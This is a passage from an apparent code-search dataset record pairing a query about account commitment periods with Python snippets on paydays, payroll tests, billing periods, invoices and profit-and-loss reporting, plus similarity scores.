{amount} dollars have been added to your bank.\\n\"\r\n \"You now have {new_balance} dollars. <:dollarbag:778687019944771616>\\n\\n\"\r\n \"You are currently #{pos} on the **global** leaderboard!\\n\"\r\n \"Use `dem leaderboard` to review your position further.\\n\"\r\n \"Use `dem slot <bid>` to take a gamble at the slot machine!\"\r\n ).format(\r\n author=author,\r\n currency=credits_name,\r\n amount=humanize_number(await self.config.PAYDAY_CREDITS()),\r\n new_balance=humanize_number(await bank.get_balance(author)),\r\n pos=humanize_number(pos)\r\n )\r\n )\r\n await ctx.send(embed=embed)\r\n\r\n else:\r\n dtime = self.display_time(next_payday - cur_time)\r\n await ctx.send(\r\n _(\r\n \"{author.mention} Too soon. For your next payday you have to wait {time}.\"\r\n ).format(author=author, time=dtime)\r\n )\r\n else:\r\n\r\n # Gets the users latest successfully payday and adds the guilds payday time\r\n next_payday = (\r\n await self.config.member(author).next_payday()\r\n + await self.config.guild(guild).PAYDAY_TIME()\r\n )\r\n if cur_time >= next_payday:\r\n credit_amount = await self.config.guild(guild).PAYDAY_CREDITS()\r\n for role in author.roles:\r\n role_credits = await self.config.role(\r\n role\r\n ).PAYDAY_CREDITS() # Nice variable name\r\n if role_credits > credit_amount:\r\n credit_amount = role_credits\r\n try:\r\n await bank.deposit_credits(author, credit_amount)\r\n except errors.BalanceTooHigh as exc:\r\n await bank.set_balance(author, exc.max_balance)\r\n await ctx.send(\r\n _(\r\n \"You've reached the maximum amount of {currency}! \"\r\n \"Please spend some more \\N{GRIMACING FACE}\\n\\n\"\r\n \"You currently have {new_balance} {currency}.\"\r\n ).format(\r\n currency=credits_name, new_balance=humanize_number(exc.max_balance)\r\n )\r\n )\r\n return\r\n\r\n # Sets the latest payday time to the current time\r\n next_payday = cur_time\r\n\r\n await self.config.member(author).next_payday.set(next_payday)\r\n \r\n pos = await bank.get_leaderboard_position(author)\r\n embed = Embed.create(\r\n self, ctx, title=\"<:dollarbag:778687019944771616> Payday!\",\r\n description=(\r\n \"{author.mention} Take a loada' cash. \"\r\n \"Don't spend it took quick!\\n\\n\"\r\n \"<:plus:777167188816560168> {amount} dollars have been added to your bank.\\n\"\r\n \"You now have {new_balance} dollars. <:dollarbag:778687019944771616>\\n\\n\"\r\n \"You are currently #{pos} on the server leaderboard!\"\r\n ).format(\r\n author=author,\r\n currency=credits_name,\r\n amount=humanize_number(await self.config.PAYDAY_CREDITS()),\r\n new_balance=humanize_number(await bank.get_balance(author)),\r\n pos=humanize_number(pos)\r\n )\r\n )\r\n await ctx.send(embed=embed)\r\n \r\n else:\r\n dtime = self.display_time(next_payday - cur_time)\r\n await ctx.send(\r\n _(\r\n \"{author.mention} Too soon. For your next payday you have to wait {time}.\"\r\n ).format(author=author, time=dtime)\r\n )", "def expirePeriodInSeconds(self)->int:\n return self._lic.params['periodInSeconds'].value", "def account_changes(self, since_transaction_id: SinceTransactionID = sentinel):\n pass", "def circulation_upcoming_return_range():\n return arrow.utcnow() + timedelta(\n days=current_app.config[\"ILS_UPCOMING_RETURN_RANGE\"])", "def committees(self):\n print(\"Scheduling a refresh of committees\")\n if not self.background_scheduler.get_job('committees'):\n self.background_scheduler.add_job(Refresh.committees,\n 'cron',\n id='committees',\n name='committees',\n day='last fri')\n self._start()", "def renewal_period(self) -> Optional[float]:\n return pulumi.get(self, \"renewal_period\")", "def period(self) -> int:", "def __init__(self):\n import datetime as dt\n import dateutil as du\n from dateutil import relativedelta\n\n #Initial date calculations\n self.right_now = dt.datetime.utcnow()\n self.beginDelta = -2\n self.endDelta = 365\n self.timeDeltaCashBegin = du.relativedelta.relativedelta(months=self.beginDelta)\n self.timeDeltaCashEnd = dt.timedelta(days=self.endDelta)\n self.begin_date = self.right_now + self.timeDeltaCashBegin\n self.end_date = self.right_now + self.timeDeltaCashEnd\n\n #today's date to initialize the Cash event\n self.today_date = str(dt.datetime.date(self.right_now))\n\n #time variable for event creation // included date list to decipher cash update days\n self.create_begin = dt.datetime.fromisoformat(self.right_now.date().isoformat()).isoformat() + 'Z'\n self.create_end = self.end_date.isoformat() + 'Z'\n self.create_duration = (self.end_date - self.right_now).days\n self.iterate_days = self.iterateList(self.create_duration)\n\n #time variables used in deletion code\n self.clear_begin = self.begin_date.isoformat() + 'Z'\n self.clear_end = self.end_date.isoformat() + 'Z'\n\n #Smaller size for event creation/deleting testing\n self.test_duration = 40\n self.test_days = self.iterateList(self.test_duration)\n \n #Store old event list to check if changes need to be made\n self.check_for_updates = []\n self.cash_history = []\n\n self.creds = self.getUsrCreds()\n self.service = self.buildAPICal(self.creds)\n self.usrCals = self.getUsrCals(self.service)\n\n #Check if Calendar is Present and get the details -- if not, build one\n if self.checkCashCal(self.usrCals) == False:\n self.usr_csh_id, self.usr_csh_cal = self.buildCashCal(self.usrCals)\n else:\n self.usr_csh_id = self.getCshID(self.usrCals)\n self.usr_csh_cal = self.getCshCal(self.usrCals)", "def get_period(self):\n raise NotImplementedError('Agent is an abstract base class')", "def utility_lifetime(self, utility_today, utility_future):\n return utility_today + self.beta * utility_future", "def test_finalize_period(self):\n employee_payments_qty = EmployeePayment.objects.filter(employer=self.test_employer).count()\n url = reverse_lazy('api:me-get-single-payroll-period', kwargs={'period_id': self.test_period.id})\n self.client.force_login(self.test_user_employer)\n response = self.client.put(url, data={'status': 'FINALIZED'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('id'), self.test_period.id, response_json)\n self.assertEqual(response_json.get('employer'), self.test_employer.id, response_json)\n self.assertEqual(response_json.get('status'), 'FINALIZED', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty + 2)\n # verify amounts, with no over_time\n employee_payment = EmployeePayment.objects.get(employer_id=self.test_employer.id,\n employee_id=self.test_employee2.id,\n payroll_period_id=self.test_period.id)\n self.assertEqual(employee_payment.earnings, Decimal('300.00'), employee_payment.earnings)", "def test_calculate_contract_duration():\n assert calculate_contract_duration(\n parse('2020-01-01'), parse('2020-03-31')\n ) == relativedelta(months=+2, days=+30)", "def return_account_balance(self, date_cursor=None):\n\n logger.info(\"Running return_account_balance for policy %s\" % self.policy.id)\n\n if not date_cursor:\n date_cursor = datetime.now().date()\n\n invoices = Invoice.query.filter_by(policy_id=self.policy.id)\\\n .filter(Invoice.bill_date <= date_cursor)\\\n .order_by(Invoice.bill_date)\\\n .all()\n logger.info(str(len(invoices)) + \" invoices queried from database for policy %s\" % self.policy.id)\n\n due_now = 0\n for invoice in invoices:\n due_now += invoice.amount_due\n\n payments = Payment.query.filter_by(policy_id=self.policy.id)\\\n .filter(Payment.transaction_date <= date_cursor)\\\n .all()\n logger.info(str(len(payments)) + \" payments queried from database for policy %s\" % self.policy.id)\n\n for payment in payments:\n due_now -= payment.amount_paid\n\n return due_now", "def expiration(self):\n return datetime(int(self.exp_year), int(self.exp_month),\n calendar.monthrange(int(self.exp_year), int(self.exp_month))[1],\n 23, 59, 59)", "def returnDepositsWithdrawals(self,\n start=datetime.now() - timedelta(days=1),\n end=datetime.now()):\n pass", "def pnl(qbo_session, period = \"YEARLY\", start_date=\"first\", end_date=\"last\",\n **kwargs):\n\n pnl_account_types = [\n \n \"Income\", \"Other Income\",\n \"Expense\", \"Other Expense\", \"Cost of Goods Sold\"\n \n ]\n\n \n\n # go through the accounts, collecting a list of those that are \n # pnl accounts\n\n relevant_accounts = []\n\n coa = qbo_session.chart_of_accounts()\n\n AccountType_i = coa[0].index(\"AccountType\")\n fqa_i = coa[0].index(\"FullyQualifiedName\")\n\n for a in coa:\n\n AccountType = a[AccountType_i]\n\n if AccountType in pnl_account_types:\n\n relevant_accounts.append(a[fqa_i])\n \n # now collect the ledger_lines that are even relevant to the time\n # period and pnl accounts (and we'll handle presentation last)\n\n relevant_activity = {} #{account:[relevant lines]}\n\n all_ledger_lines = qbo_session.ledger_lines(None, None, None, True,\n **kwargs)\n\n headers = all_ledger_lines[0]\n\n account_i = headers.index(\"account\") \n amount_i = headers.index(\"amount\")\n date_i = headers.index(\"TxnDate\")\n \n earliest_date = datetime(2100,1,1)\n latest_date = datetime(1900,1,1)\n\n for line in all_ledger_lines[1:]:\n\n account = line[account_i]\n line_date = line[date_i]\n\n #first apply the date filter!\n if not start_date == \"first\" and line_date < start_date:\n continue\n \n if not end_date == \"last\" and line_date > end_date:\n continue\n \n #if it's made the cut, we can update the report date bounds\n earliest_date = min(line_date,earliest_date)\n latest_date = max(line_date,latest_date)\n\n #then apply the account filter!\n\n if not account in relevant_activity:\n #then let's confirm that its account type is a pnl one\n \n if not account in relevant_accounts:\n \n continue\n\n else:\n relevant_activity[account] = []\n\n relevant_activity[account].append(line)\n\n #now let's do presentation\n #TODO -- incorporate pandas tables...do only minimal work on it until then\n\n pnl_lines = []\n\n if period == \"YEARLY\":\n\n report_start_date = datetime(earliest_date.year,1,1)\n report_end_date = datetime(latest_date.year,12,31)\n\n period_start_dates = list(rrule(YEARLY, bymonth=1, bymonthday=1,\n dtstart=report_start_date,\n until=report_end_date))\n\n period_end_dates = list(rrule(YEARLY, bymonth=12, bymonthday=-1,\n dtstart=report_start_date,\n until=report_end_date))\n\n elif period == \"MONTHLY\":\n\n report_start_date = datetime(earliest_date.year,\n earliest_date.month,\n 1)\n report_end_date = datetime(latest_date.year,\n latest_date.month,\n calendar.monthrange(latest_date.year,\n latest_date.month)[1])\n\n period_start_dates = list(rrule(MONTHLY, bymonthday=1,\n dtstart=report_start_date,\n until=report_end_date))\n\n period_end_dates = list(rrule(YEARLY, bymonthday=-1,\n dtstart=report_start_date,\n until=report_end_date)) \n\n header_1 = [\"\", \"Period Start -->\"] + period_start_dates\n header_2 = [\"Account\", \"Period End -->\"] + period_end_dates\n\n pnl_lines.append(header_1)\n pnl_lines.append(header_2)\n\n \"\"\"Clearly, there's a way to do this with only one pass of the data...\n let's get that right in the first re-write...probably with pandas\"\"\"\n\n #now let's fill up the pnl_lines with what we know to be the relevant data\n #for now, we'll rely on the knowledge that the data is coming to us in\n #date order, but that should be fixed too...\n\n for account in relevant_activity:\n\n account_row = [account, \"\"] #one value per period \n\n current_period_index = 0 #primitive counter, yes!\n this_period_total = 0 #this will be this period's total\n\n for line in relevant_activity[account]:\n \n line_amount = line[amount_i]\n line_date = line[date_i] \n\n if line_date > period_end_dates[current_period_index]:\n\n account_row.append(this_period_total)\n this_period_total = line_amount\n current_period_index +=1\n\n else:\n \n this_period_total = round(this_period_total +\n line_amount, 2)\n\n \"\"\"super sloppy...\"\"\"\n account_row.append(this_period_total) #for the last period\n current_period_index +=1\n\n while current_period_index < len(period_end_dates):\n account_row.append(0)\n current_period_index +=1\n\n pnl_lines.append(account_row)\n\n return pnl_lines", "def test_list_grading_periods_accounts(self):\r\n account_id = None # Change me!!\r\n\r\n r = self.client.list_grading_periods_accounts(account_id)", "def get_deadline(self):\n min_time = self.introduction_time or 0\n return min_time + self.time_slot[0] * self.__period", "def compute_periodpayoff(self):\n logger.debug(u\"{} Period Payoff\".format(self.joueur))\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff = 0\n\n # cumulative payoff since the first period\n if self.currentperiod.EXPERIENCE_NOM_COURT_period < 2:\n self.currentperiod.EXPERIENCE_NOM_COURT_cumulativepayoff = \\\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff\n else: \n previousperiod = self.periods[self.currentperiod.EXPERIENCE_NOM_COURT_period - 1]\n self.currentperiod.EXPERIENCE_NOM_COURT_cumulativepayoff = \\\n previousperiod.EXPERIENCE_NOM_COURT_cumulativepayoff + \\\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff\n\n # we store the period in the self.periodes dictionnary\n self.periods[self.currentperiod.EXPERIENCE_NOM_COURT_period] = self.currentperiod\n\n logger.debug(u\"{} Period Payoff {}\".format(\n self.joueur,\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff))", "def test_finalize_period_overtime(self):\n employee_payments_qty = EmployeePayment.objects.filter(employer=self.test_employer).count()\n url = reverse_lazy('api:me-get-single-payroll-period', kwargs={'period_id': self.test_period.id})\n self.client.force_login(self.test_user_employer)\n response = self.client.put(url, data={'status': 'FINALIZED'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('id'), self.test_period.id, response_json)\n self.assertEqual(response_json.get('employer'), self.test_employer.id, response_json)\n self.assertEqual(response_json.get('status'), 'FINALIZED', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty + 2)\n # verify amounts, with over_time\n employee_payment = EmployeePayment.objects.get(employer_id=self.test_employer.id,\n employee_id=self.test_employee.id,\n payroll_period_id=self.test_period.id)\n self.assertEqual(employee_payment.earnings, Decimal('360.00') + Decimal('450.00'),\n employee_payment.earnings)", "def deadline(self):\n\n if self.service and self.service.solution_time:\n return self.created + \\\n timedelta(hours=self.service.solution_time) - \\\n timedelta(seconds=self._time_on_hold)\n else:\n return None", "def billing_period(self) -> Optional[str]:\n return pulumi.get(self, \"billing_period\")", "def payment_cycle(self) -> Optional[pulumi.Input['GoogleCloudChannelV1PeriodArgs']]:\n return pulumi.get(self, \"payment_cycle\")", "def test_finalize_and_open_period(self):\n employee_payments_qty = EmployeePayment.objects.filter(employer=self.test_employer).count()\n url = reverse_lazy('api:me-get-single-payroll-period', kwargs={'period_id': self.test_period2.id})\n self.client.force_login(self.test_user_employer)\n # change from OPEN to FINALIZE\n response = self.client.put(url, data={'status': 'FINALIZED'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('status'), 'FINALIZED', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty + 1)\n # change from FINALIZE to OPEN\n response = self.client.put(url, data={'status': 'OPEN'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('status'), 'OPEN', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty)" ]
[ "0.5595547", "0.556296", "0.5546404", "0.5526741", "0.52279395", "0.5222263", "0.5204489", "0.51837915", "0.5149062", "0.5121727", "0.5081491", "0.5066678", "0.50160015", "0.5004779", "0.49921027", "0.49675107", "0.49551263", "0.4941851", "0.49270973", "0.49227467", "0.4918205", "0.4911476", "0.49099314", "0.49072093", "0.48913255", "0.48905048", "0.48638746", "0.48467177", "0.48088193", "0.48062244" ]
0.6236221
0
The list of ProvisioningIssue.
def provisioning_issues(self) -> Sequence[str]: return pulumi.get(self, "provisioning_issues")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def get_issues(self) -> [\"AIOGitHubAPIRepositoryIssue\"]:\n _endpoint = f\"/repos/{self.full_name}/issues\"\n\n response = await self.client.get(endpoint=_endpoint)\n return [AIOGitHubAPIRepositoryIssue(self.client, x) for x in response or []]", "def issues(self) -> Iterable[Issue]:\n # Make request\n issues = self.shards_xml(\"issues\")[\"issues\"]\n # Return boxed Issues (may crash badly if authentication failed)\n return [Issue.from_xml(node) for node in issues]", "def issues(self):\r\n return issues.Issues(self)", "def issues(self):\r\n return issues.RepoIssues(self)", "def issues(self):\r\n return issues.RepoIssues(self)", "def get_sprint_board_issues(self) -> list:\n endpoint_path = f'agile/1.0/sprint/{self.sprint}/issue'\n data = {\n 'jql': 'status=\"In Review\"',\n 'fields': ['assignee', 'status', 'summary'],\n }\n response = self._get(endpoint_path, data)\n return self._parser.filter_out_important_data(response)", "def get_product_issues(context, data_dict):\n # noinspection PyUnresolvedReferences\n product_id = _get_or_bust(data_dict, 'productId')\n\n slr = make_connection()\n\n response = json.loads(\n slr.raw_query(\n q='top_parent_id:{pid}'.format(\n pid=product_id\n ),\n group='true',\n group_field='issue_number_int',\n wt='json',\n sort='issue_number_int desc',\n # FIXME: We need to actually paginate on this, but the daily\n # team will not accept it (yet).\n rows='2000000'\n )\n )\n\n issue_no_group = response['grouped']['issue_number_int']\n\n return [{\n 'issue': group['groupValue'],\n 'number_articles': group['doclist']['numFound']\n } for group in issue_no_group['groups']]", "def components(self):\r\n return IssueComponents(self)", "def get_queryset(self):\n queryset = Issue.objects.filter(project_id=self.project.pk)\n return queryset", "def issues(self):\n if self.pull_request.body is not None:\n regex = r\"(?<=closes: #|elated: #)\\d{5}\"\n issue_strs = re.findall(regex, self.pull_request.body)\n self.issue_nums = [eval(s) for s in issue_strs]", "def issues(self) -> List[IssueType]:\n return [IssueType.FREE_SPACE]", "def problem_list(self):\r\n return [{\r\n 'location': location, 'problem_name': name,\r\n 'num_graded': self.DUMMY_DATA['problem_list_num_graded'],\r\n 'num_pending': self.DUMMY_DATA['problem_list_num_pending'],\r\n 'num_required': self.DUMMY_DATA['problem_list_num_required']\r\n } for location, name in self.problems.items()\r\n ]", "def list_issues(self, jira_con, search_jql):\n assert jira_con, \"Requires jira_con\"\n assert search_jql, \"Requires search_jql\"\n assert self.log\n dict_keys = ('name', 'percent', 'watchCount', 'votes', 'progress', 'value')\n\n issues = jira_con.search_issues(search_jql + ' order by issue')\n self.log.info('\\nResults for {}:'.format(search_jql))\n for issue in issues:\n s = str(issue)\n for key, value in issue.raw['fields'].iteritems():\n if value:\n found = False\n if type(value) is not dict:\n found = True\n s += ', ' + key + '=' + unicode(value)\n else:\n for k in dict_keys:\n if k in value:\n found = True\n s += ', ' + key + '=' + str(value[k])\n if not found:\n s += ', ' + key + '=(' + unicode(type(value)) + ') ' + str(value)\n self.log.info(s)\n return issues", "def issues_list(self, mar, request):\n if request.additionalProject:\n for project_name in request.additionalProject:\n project = self._services.project.GetProjectByName(\n mar.cnxn, project_name)\n if project and not permissions.UserCanViewProject(\n mar.auth.user_pb, mar.auth.effective_ids, project):\n raise permissions.PermissionException(\n 'The user %s has no permission for project %s' %\n (mar.auth.email, project_name))\n url_params = [(name, mar.GetParam(name)) for name in\n framework_helpers.RECOGNIZED_PARAMS]\n # TODO(jrobbins): This should go through work_env.\n pipeline = frontendsearchpipeline.FrontendSearchPipeline(\n mar.cnxn, self._services, mar.auth, [mar.me_user_id], mar.query,\n mar.query_project_names, mar.num, mar.start, url_params, mar.can,\n mar.group_by_spec, mar.sort_spec, mar.warnings, mar.errors,\n mar.use_cached_searches, mar.profiler, display_mode=mar.mode,\n project=mar.project)\n if not mar.errors.AnyErrors():\n pipeline.SearchForIIDs()\n pipeline.MergeAndSortIssues()\n pipeline.Paginate()\n else:\n raise endpoints.BadRequestException(mar.errors.query)\n\n issue_list = [\n api_pb2_v1_helpers.convert_issue(\n api_pb2_v1.IssueWrapper, r, mar, self._services)\n for r in pipeline.visible_results]\n return api_pb2_v1.IssuesListResponse(\n kind='monorail#issueList',\n totalResults=pipeline.total_count,\n items=issue_list)", "def retrieve_open_issues(self):\n return self._retrieve_issues(\"open\")", "def test_issue_list_issues(self):\n pass", "def problems(self):\n return self.configuration.problems", "def list_issues(self, interval: str, threat_status: str = None, threat_type: str = None) -> dict:\n params = remove_empty_elements({\"interval\": interval,\n \"threatStatus\": threat_status,\n \"threatType\": threat_type,\n \"format\": \"json\"})\n return self.http_request(\"GET\", '/siem/issues', params=params)", "def get_problems(self):\n\n with self.__orm.session_scope() as session:\n try:\n problems = session.query(Problem.name).all()\n return [problem[0] for problem in problems]\n except NoResultFound:\n return []", "def get_permisos(self):\n return [p for p in self.permisos.all()]", "def _get_problem_list(self):\r\n self._success_response({'problem_list': self.server.problem_list})", "def versions(self):\r\n return IssueVersions(self)", "def comments(self):\r\n return IssueComments(self)", "def comments(self):\r\n return IssueComments(self)", "def labels(self):\r\n return labels.IssueLabels(self)", "def test_issues_list(self):\n response = self.client.get(url_for('issues.issuesresource'))\n self.assertEqual(response.status_code, 200)\n self.assertTrue(response.json)", "def get_jira_issues(query):\n jira_issues = []\n defects = []\n count, maxlen = 0, 1\n while count < maxlen:\n issues = jira_client.search_issues(query, startAt=count, maxResults=50, expand='changelog')\n jira_issues.extend(issues)\n count = len(jira_issues)\n maxlen = issues.total\n\n return jira_issues", "def list_issues(self, chat):\n issues = self.url_handler.get_json_from_url(constants.URL_GITHUB)\n msg = ''\n msg += '\\U0001F4CB Issues List\\n\\n'\n for aux in issues:\n msg += \"[[{}]] - {}\\n\\n\".format(str(aux['number']), aux['title'])\n\n self.url_handler.send_message(msg, chat)", "def events(self):\r\n return IssueEvents(self)", "def events(self):\r\n return IssueEvents(self)" ]
[ "0.63413113", "0.6226929", "0.61056864", "0.6073216", "0.6073216", "0.60230535", "0.5824415", "0.57908684", "0.5765761", "0.57227564", "0.56972843", "0.5593333", "0.555865", "0.545716", "0.5440722", "0.54217577", "0.5414522", "0.541265", "0.5391178", "0.5390083", "0.5378608", "0.5321044", "0.5169411", "0.5169411", "0.5160285", "0.51341265", "0.5123277", "0.5120164", "0.5097267", "0.5097267" ]
0.7382787
0
Cognitive Services account commitment period.
def current(self) -> Optional['outputs.CommitmentPeriodResponse']: return pulumi.get(self, "current")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def last(self) -> 'outputs.CommitmentPeriodResponse':\n return pulumi.get(self, \"last\")", "def get_period_guarantee_advance(self):\n return ceiling(self.scheduled_completion, 3)", "def current_effective_deadline(cls) -> float:", "def next(self) -> Optional['outputs.CommitmentPeriodResponse']:\n return pulumi.get(self, \"next\")", "def checkpoint_period_get(self):\n raise Exception(\"TODO\")", "def update_period(self):\n return 0.1", "async def payday(self, ctx: commands.Context):\r\n author = ctx.author\r\n guild = ctx.guild\r\n\r\n cur_time = calendar.timegm(ctx.message.created_at.utctimetuple())\r\n credits_name = await bank.get_currency_name(ctx.guild)\r\n if await bank.is_global(): # Role payouts will not be used\r\n\r\n # Gets the latest time the user used the command successfully and adds the global payday time\r\n next_payday = (\r\n await self.config.user(author).next_payday() + await self.config.PAYDAY_TIME()\r\n )\r\n if cur_time >= next_payday:\r\n try:\r\n await bank.deposit_credits(author, await self.config.PAYDAY_CREDITS())\r\n except errors.BalanceTooHigh as exc:\r\n await bank.set_balance(author, exc.max_balance)\r\n await ctx.send(\r\n _(\r\n \"You've reached the maximum amount of {currency}!\"\r\n \"Please spend some more \\N{GRIMACING FACE}\\n\\n\"\r\n \"You currently have {new_balance} {currency}.\"\r\n ).format(\r\n currency=credits_name, new_balance=humanize_number(exc.max_balance)\r\n )\r\n )\r\n return\r\n # Sets the current time as the latest payday\r\n await self.config.user(author).next_payday.set(cur_time)\r\n\r\n pos = await bank.get_leaderboard_position(author)\r\n embed = Embed.create(\r\n self, ctx, title=\"<:dollarbag:778687019944771616> Payday!\",\r\n description=(\r\n \"Here you go, {author.name}. \"\r\n \"Don't spend it too quickly!\\n\\n\"\r\n \"<:plus:777167188816560168> {amount} dollars have been added to your bank.\\n\"\r\n \"You now have {new_balance} dollars. <:dollarbag:778687019944771616>\\n\\n\"\r\n \"You are currently #{pos} on the **global** leaderboard!\\n\"\r\n \"Use `dem leaderboard` to review your position further.\\n\"\r\n \"Use `dem slot <bid>` to take a gamble at the slot machine!\"\r\n ).format(\r\n author=author,\r\n currency=credits_name,\r\n amount=humanize_number(await self.config.PAYDAY_CREDITS()),\r\n new_balance=humanize_number(await bank.get_balance(author)),\r\n pos=humanize_number(pos)\r\n )\r\n )\r\n await ctx.send(embed=embed)\r\n\r\n else:\r\n dtime = self.display_time(next_payday - cur_time)\r\n await ctx.send(\r\n _(\r\n \"{author.mention} Too soon. For your next payday you have to wait {time}.\"\r\n ).format(author=author, time=dtime)\r\n )\r\n else:\r\n\r\n # Gets the users latest successfully payday and adds the guilds payday time\r\n next_payday = (\r\n await self.config.member(author).next_payday()\r\n + await self.config.guild(guild).PAYDAY_TIME()\r\n )\r\n if cur_time >= next_payday:\r\n credit_amount = await self.config.guild(guild).PAYDAY_CREDITS()\r\n for role in author.roles:\r\n role_credits = await self.config.role(\r\n role\r\n ).PAYDAY_CREDITS() # Nice variable name\r\n if role_credits > credit_amount:\r\n credit_amount = role_credits\r\n try:\r\n await bank.deposit_credits(author, credit_amount)\r\n except errors.BalanceTooHigh as exc:\r\n await bank.set_balance(author, exc.max_balance)\r\n await ctx.send(\r\n _(\r\n \"You've reached the maximum amount of {currency}! \"\r\n \"Please spend some more \\N{GRIMACING FACE}\\n\\n\"\r\n \"You currently have {new_balance} {currency}.\"\r\n ).format(\r\n currency=credits_name, new_balance=humanize_number(exc.max_balance)\r\n )\r\n )\r\n return\r\n\r\n # Sets the latest payday time to the current time\r\n next_payday = cur_time\r\n\r\n await self.config.member(author).next_payday.set(next_payday)\r\n \r\n pos = await bank.get_leaderboard_position(author)\r\n embed = Embed.create(\r\n self, ctx, title=\"<:dollarbag:778687019944771616> Payday!\",\r\n description=(\r\n \"{author.mention} Take a loada' cash. \"\r\n \"Don't spend it took quick!\\n\\n\"\r\n \"<:plus:777167188816560168> {amount} dollars have been added to your bank.\\n\"\r\n \"You now have {new_balance} dollars. <:dollarbag:778687019944771616>\\n\\n\"\r\n \"You are currently #{pos} on the server leaderboard!\"\r\n ).format(\r\n author=author,\r\n currency=credits_name,\r\n amount=humanize_number(await self.config.PAYDAY_CREDITS()),\r\n new_balance=humanize_number(await bank.get_balance(author)),\r\n pos=humanize_number(pos)\r\n )\r\n )\r\n await ctx.send(embed=embed)\r\n \r\n else:\r\n dtime = self.display_time(next_payday - cur_time)\r\n await ctx.send(\r\n _(\r\n \"{author.mention} Too soon. For your next payday you have to wait {time}.\"\r\n ).format(author=author, time=dtime)\r\n )", "def expirePeriodInSeconds(self)->int:\n return self._lic.params['periodInSeconds'].value", "def account_changes(self, since_transaction_id: SinceTransactionID = sentinel):\n pass", "def circulation_upcoming_return_range():\n return arrow.utcnow() + timedelta(\n days=current_app.config[\"ILS_UPCOMING_RETURN_RANGE\"])", "def committees(self):\n print(\"Scheduling a refresh of committees\")\n if not self.background_scheduler.get_job('committees'):\n self.background_scheduler.add_job(Refresh.committees,\n 'cron',\n id='committees',\n name='committees',\n day='last fri')\n self._start()", "def renewal_period(self) -> Optional[float]:\n return pulumi.get(self, \"renewal_period\")", "def period(self) -> int:", "def __init__(self):\n import datetime as dt\n import dateutil as du\n from dateutil import relativedelta\n\n #Initial date calculations\n self.right_now = dt.datetime.utcnow()\n self.beginDelta = -2\n self.endDelta = 365\n self.timeDeltaCashBegin = du.relativedelta.relativedelta(months=self.beginDelta)\n self.timeDeltaCashEnd = dt.timedelta(days=self.endDelta)\n self.begin_date = self.right_now + self.timeDeltaCashBegin\n self.end_date = self.right_now + self.timeDeltaCashEnd\n\n #today's date to initialize the Cash event\n self.today_date = str(dt.datetime.date(self.right_now))\n\n #time variable for event creation // included date list to decipher cash update days\n self.create_begin = dt.datetime.fromisoformat(self.right_now.date().isoformat()).isoformat() + 'Z'\n self.create_end = self.end_date.isoformat() + 'Z'\n self.create_duration = (self.end_date - self.right_now).days\n self.iterate_days = self.iterateList(self.create_duration)\n\n #time variables used in deletion code\n self.clear_begin = self.begin_date.isoformat() + 'Z'\n self.clear_end = self.end_date.isoformat() + 'Z'\n\n #Smaller size for event creation/deleting testing\n self.test_duration = 40\n self.test_days = self.iterateList(self.test_duration)\n \n #Store old event list to check if changes need to be made\n self.check_for_updates = []\n self.cash_history = []\n\n self.creds = self.getUsrCreds()\n self.service = self.buildAPICal(self.creds)\n self.usrCals = self.getUsrCals(self.service)\n\n #Check if Calendar is Present and get the details -- if not, build one\n if self.checkCashCal(self.usrCals) == False:\n self.usr_csh_id, self.usr_csh_cal = self.buildCashCal(self.usrCals)\n else:\n self.usr_csh_id = self.getCshID(self.usrCals)\n self.usr_csh_cal = self.getCshCal(self.usrCals)", "def get_period(self):\n raise NotImplementedError('Agent is an abstract base class')", "def utility_lifetime(self, utility_today, utility_future):\n return utility_today + self.beta * utility_future", "def test_finalize_period(self):\n employee_payments_qty = EmployeePayment.objects.filter(employer=self.test_employer).count()\n url = reverse_lazy('api:me-get-single-payroll-period', kwargs={'period_id': self.test_period.id})\n self.client.force_login(self.test_user_employer)\n response = self.client.put(url, data={'status': 'FINALIZED'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('id'), self.test_period.id, response_json)\n self.assertEqual(response_json.get('employer'), self.test_employer.id, response_json)\n self.assertEqual(response_json.get('status'), 'FINALIZED', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty + 2)\n # verify amounts, with no over_time\n employee_payment = EmployeePayment.objects.get(employer_id=self.test_employer.id,\n employee_id=self.test_employee2.id,\n payroll_period_id=self.test_period.id)\n self.assertEqual(employee_payment.earnings, Decimal('300.00'), employee_payment.earnings)", "def test_calculate_contract_duration():\n assert calculate_contract_duration(\n parse('2020-01-01'), parse('2020-03-31')\n ) == relativedelta(months=+2, days=+30)", "def return_account_balance(self, date_cursor=None):\n\n logger.info(\"Running return_account_balance for policy %s\" % self.policy.id)\n\n if not date_cursor:\n date_cursor = datetime.now().date()\n\n invoices = Invoice.query.filter_by(policy_id=self.policy.id)\\\n .filter(Invoice.bill_date <= date_cursor)\\\n .order_by(Invoice.bill_date)\\\n .all()\n logger.info(str(len(invoices)) + \" invoices queried from database for policy %s\" % self.policy.id)\n\n due_now = 0\n for invoice in invoices:\n due_now += invoice.amount_due\n\n payments = Payment.query.filter_by(policy_id=self.policy.id)\\\n .filter(Payment.transaction_date <= date_cursor)\\\n .all()\n logger.info(str(len(payments)) + \" payments queried from database for policy %s\" % self.policy.id)\n\n for payment in payments:\n due_now -= payment.amount_paid\n\n return due_now", "def expiration(self):\n return datetime(int(self.exp_year), 